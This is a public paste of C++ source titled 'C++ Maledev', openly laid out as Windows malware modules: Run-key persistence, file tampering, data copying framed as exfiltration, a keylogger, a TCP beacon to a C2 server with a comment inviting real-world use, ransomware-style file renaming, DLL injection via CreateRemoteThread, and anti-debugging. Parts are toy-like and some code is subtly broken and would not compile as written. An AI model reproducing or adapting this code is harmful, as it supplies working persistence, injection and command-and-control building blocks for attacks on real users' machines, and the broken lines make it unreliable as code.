Advertisement
Guest User

C++ Maledev

a guest
Dec 15th, 2024
450
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.17 KB | None | 0 0
  1. #include <iostream>
  2. #include <fstream>
  3. #include <string>
  4. #include <vector>
  5. #include <windows.h>
  6. #include <winreg.h>
  7. #include <direct.h>
  8. #include <filesystem>
  9. #include <chrono>
  10. #include <thread>
  11. #include <winsock2.h>
  12. #include <ws2tcpip.h>
  13. #include <Psapi.h>
  14. #include <TlHelp32.h>
  15. #include <Shlwapi.h>
  16. #include <Dbghelp.h>
  17.  
  18. #pragma comment(lib, "ws2_32.lib")
  19. #pragma comment(lib, "Psapi.lib")
  20. #pragma comment(lib, "Shlwapi.lib")
  21. #pragma comment(lib, "Dbghelp.lib")
  22.  
  23. namespace fs = std::filesystem;
  24.  
  25. // Module: Persistence
  26. class Persistence {
  27. public:
  28. static void establish() {
  29. HKEY hKey;
  30. std::wstring path = fs::current_path().wstring() + L"\\malware.exe";
  31. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
  32. RegSetValueEx(hKey, L"Malware", 0, REG_SZ, (BYTE*)path.c_str(), (DWORD)(path.length() + 1) * sizeof(wchar_t));
  33. RegCloseKey(hKey);
  34. std::wcout << L"[+] Persistence established" << std::endl;
  35. } else {
  36. std::wcout << L"[!] Failed to establish persistence" << std::endl;
  37. }
  38. }
  39.  
  40. static void remove() {
  41. HKEY hKey;
  42. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
  43. RegDeleteValue(hKey, L"Malware");
  44. RegCloseKey(hKey);
  45. std::wcout << L"[+] Removed persistence" << std::endl;
  46. }
  47. }
  48. };
  49.  
  50. // Module: File Infection
  51. class FileInfection {
  52. public:
  53. static void infect() {
  54. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  55. if (entry.path().extension() == ".txt") {
  56. std::wofstream file(entry.path(), std::ios::app);
  57. if (file.is_open()) {
  58. file << L"\n\n[Malicious payload: This file has been compromised]";
  59. file.close();
  60. std::wcout << L"[*] Infected file: " << entry.path().wstring() << std::endl;
  61. }
  62. }
  63. }
  64. }
  65. };
  66.  
  67. // Module: Data Exfiltration
  68. class DataExfiltration {
  69. public:
  70. static void exfiltrate(const fs::path& source, const fs::path& destination) {
  71. if (fs::exists(source)) {
  72. fs::copy_file(source, destination, fs::copy_options::overwrite_existing);
  73. std::wcout << L"[+] Sensitive data exfiltrated to: " << destination.wstring() << std::endl;
  74. } else {
  75. std::wcout << L"[!] File for data exfiltration not found" << std::endl;
  76. }
  77. }
  78. };
  79.  
  80. // Module: Keylogger
  81. class Keylogger {
  82. private:
  83. std::wofstream logFile;
  84.  
  85. public:
  86. Keylogger() {
  87. logFile.open("keylog.txt", std::ios::app);
  88. }
  89.  
  90. ~Keylogger() {
  91. if (logFile.is_open()) logFile.close();
  92. }
  93.  
  94. void start() {
  95. if (logFile.is_open()) {
  96. std::wcout << L"[+] Starting keylogger" << std::endl;
  97. for(int i = 0; i < 100; ++i) { // Log 100 keystrokes for demo
  98. if (_kbhit()) {
  99. wchar_t key = _getwch();
  100. if (key >= L'a' && key <= L'z') key = key - 32; // Convert to uppercase
  101. logFile << key;
  102. }
  103. std::this_thread::sleep_for(std::chrono::milliseconds(100));
  104. }
  105. std::wcout << L"[+] Keylogger stopped" << std::endl;
  106. } else {
  107. std::wcout << L"[!] Failed to start keylogger" << std::endl;
  108. }
  109. }
  110. };
  111.  
  112. // Module: C2 Communication
  113. class C2Communication {
  114. public:
  115. static void communicate(const std::string& ipAddress, int port) {
  116. WSADATA wsaData;
  117. SOCKET ConnectSocket = INVALID_SOCKET;
  118. struct sockaddr_in clientService;
  119.  
  120. if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
  121. std::wcout << L"[!] Failed to initialize Winsock" << std::endl;
  122. return;
  123. }
  124.  
  125. ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  126. if (ConnectSocket == INVALID_SOCKET) {
  127. std::wcout << L"[!] Error at socket()" << std::endl;
  128. WSACleanup();
  129. return;
  130. }
  131.  
  132. clientService.sin_family = AF_INET;
  133. clientService.sin_addr.s_addr = inet_addr(ipAddress.c_str());
  134. clientService.sin_port = htons(port);
  135.  
  136. if (connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService)) == SOCKET_ERROR) {
  137. std::wcout << L"[!] Failed to connect to C2 server" << std::endl;
  138. closesocket(ConnectSocket);
  139. WSACleanup();
  140. return;
  141. }
  142.  
  143. const char* message = "Malware beacon";
  144. send(ConnectSocket, message, strlen(message), 0);
  145. std::wcout << L"[+] Beacon sent to C2 server" << std::endl;
  146.  
  147. closesocket(ConnectSocket);
  148. WSACleanup();
  149. }
  150. };
  151.  
  152. // Module: Ransomware Simulation
  153. class Ransomware {
  154. public:
  155. static void encryptFiles() {
  156. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  157. std::wstring ext = entry.path().wstring().extension();
  158. if (ext == L".docx" || ext == L".pdf" || ext == L".txt") {
  159. fs::path encryptedPath = entry.path().wstring() + L".encrypted";
  160. fs::rename(entry.path(), encryptedPath);
  161. std::wcout << L"[*] File encrypted: " << entry.path().wstring() << L" -> " << encryptedPath.wstring() << std::endl;
  162. }
  163. }
  164. }
  165.  
  166. static void decryptFiles() {
  167. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  168. if (entry.path().extension() == ".encrypted") {
  169. fs::path originalPath = entry.path().wstring().substr(0, entry.path().wstring().length() - 10); // remove .encrypted
  170. fs::rename(entry.path(), originalPath);
  171. std::wcout << L"[*] File decrypted for demo: " << entry.path().wstring() << std::endl;
  172. }
  173. }
  174. }
  175. };
  176.  
  177. // Module: Process Injection
  178. class ProcessInjection {
  179. public:
  180. static void inject(const char* targetProcessName, const char* dllPath) {
  181. HANDLE hProcess = NULL, hThread = NULL;
  182. HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
  183. LPVOID pLoadLibrary = (LPVOID)GetProcAddress(hKernel32, "LoadLibraryA");
  184.  
  185. PROCESSENTRY32 pe32;
  186. pe32.dwSize = sizeof(PROCESSENTRY32);
  187.  
  188. HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  189. if (hSnapshot == INVALID_HANDLE_VALUE) return;
  190.  
  191. if (Process32First(hSnapshot, &pe32)) {
  192. do {
  193. if (strcmp(pe32.szExeFile, targetProcessName) == 0) {
  194. hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
  195. if (hProcess) {
  196. LPVOID pRemoteString = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
  197. if (pRemoteString) {
  198. WriteProcessMemory(hProcess, pRemoteString, (LPVOID)dllPath, strlen(dllPath) + 1, NULL);
  199.  
  200. hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, NULL);
  201. if (hThread) {
  202. WaitForSingleObject(hThread, INFINITE);
  203. VirtualFreeEx(hProcess, pRemoteString, 0, MEM_RELEASE);
  204. }
  205. }
  206. CloseHandle(hProcess);
  207. }
  208. break;
  209. }
  210. } while (Process32Next(hSnapshot, &pe32));
  211. }
  212. CloseHandle(hSnapshot);
  213. if (hThread) CloseHandle(hThread);
  214. std::wcout << L"[+] DLL injected into " << targetProcessName << std::endl;
  215. }
  216. };
  217.  
  218. // Module: Anti-Debugging
  219. class AntiDebugging {
  220. public:
  221. static bool isDebuggerPresent() {
  222. return IsDebuggerPresent();
  223. }
  224.  
  225. static void checkForDebuggers() {
  226. if (isDebuggerPresent()) {
  227. std::wcout << L"[!] Debugger detected, exiting..." << std::endl;
  228. exit(1);
  229. }
  230. }
  231.  
  232. static void antiDebuggingLoop() {
  233. while (true) {
  234. checkForDebuggers();
  235. Sleep(1000); // Check every second
  236. }
  237. }
  238. };
  239.  
  240. // Module: Privilege Escalation Check
  241. class PrivilegeEscalation {
  242. public:
  243. static bool isAdmin() {
  244. BOOL isAdmin = FALSE;
  245. PSID AdministratorsGroup;
  246. SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
  247. if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
  248. CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
  249. FreeSid(AdministratorsGroup);
  250. }
  251. return isAdmin;
  252. }
  253. };
  254.  
  255. int main() {
  256. std::wcout << L"[!] Running Malware Demonstration" << std::endl;
  257.  
  258. // Check for admin rights
  259. if (PrivilegeEscalation::isAdmin()) {
  260. std::wcout << L"[+] Running with admin rights" << std::endl;
  261. } else {
  262. std::wcout << L"[+] Running without admin rights" << std::endl;
  263. }
  264.  
  265. // Anti-Debugging
  266. std::thread antiDebugThread(AntiDebugging::antiDebuggingLoop);
  267. antiDebugThread.detach();
  268.  
  269. // Persistence
  270. Persistence::establish();
  271.  
  272. // File Infection
  273. FileInfection::infect();
  274.  
  275. // Data Exfiltration
  276. DataExfiltration::exfiltrate("sensitive_data.txt", "C:\\temp\\stolen_data.txt");
  277.  
  278. // Keylogger
  279. Keylogger keylogger;
  280. keylogger.start();
  281.  
  282. // C2 Communication
  283. C2Communication::communicate("127.0.0.1", 4444); // Replace with actual C2 server for real-world use
  284.  
  285. // Ransomware
  286. Ransomware::encryptFiles();
  287.  
  288. // Process Injection (Demo with notepad, replace with actual process name in real scenarios)
  289. ProcessInjection::inject("notepad.exe", "C:\\path\\to\\your\\dll.dll"); // Path to a DLL for demonstration
  290.  
  291. // Clean up
  292. Persistence::remove();
  293. Ransomware::decryptFiles();
  294. fs::remove(L"C:\\temp\\stolen_data.txt");
  295. std::wcout << L"[+] Cleaned up operations" << std::endl;
  296.  
  297. return 0;
  298. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement